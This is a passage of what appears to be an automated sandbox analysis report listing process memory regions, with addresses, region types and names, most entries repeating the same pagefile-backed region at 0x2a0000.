start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9211 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9212 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9213 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9214 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9215 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9216 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9217 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9218 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9219 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9220 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9221 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9222 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 9223 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9224 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9225 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9226 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9227 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9228 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9229 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9230 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9231 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9232 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9233 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9234 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9235 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 9236 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9237 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9238 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9239 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9240 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9241 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9242 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9243 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9244 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9245 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9246 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9247 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9248 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9249 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9250 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9251 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9252 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9253 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9254 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9255 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9256 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9257 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9258 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9259 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9260 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9261 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9262 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9263 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9264 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9265 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9266 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9267 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9268 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9269 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9270 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9271 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9272 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9273 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9274 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9275 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9276 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9277 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9278 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9279 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9280 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9281 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9282 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9283 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9284 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9384 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9385 start_va = 0x1c10000 end_va = 0x201ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9386 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9387 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9388 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9389 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9390 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9391 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9392 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9393 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9394 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9395 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9396 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9397 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9398 start_va = 0x2a0000 
end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9399 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9400 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9401 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9402 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9403 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9404 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9405 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9406 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9407 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9408 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9409 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9410 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9411 
start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9412 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9413 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9414 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9416 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9417 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9418 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9419 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9420 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9421 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9422 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9423 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9424 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 9425 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9426 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9427 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9428 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9429 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9430 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9431 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9432 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9433 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9434 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9435 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9466 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9467 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" 
filename = "" Region: id = 9468 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9469 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9470 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9471 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9472 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9473 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9474 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9475 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9476 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9477 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9478 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9479 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9480 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9481 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9482 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9483 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9484 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9485 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9486 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9487 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9488 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9489 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9490 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9491 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9492 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9493 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9494 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9500 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9501 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9502 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9503 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9504 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9505 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9506 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9507 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9508 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9509 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9510 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9511 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9512 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9513 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9514 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9515 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9516 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9517 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9518 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9519 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9520 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9521 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9522 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9523 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9524 start_va = 0x2a0000 end_va = 
0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9590 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9591 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9592 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9593 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9594 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9595 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9596 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9597 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9598 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9599 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9600 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9601 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9602 start_va = 
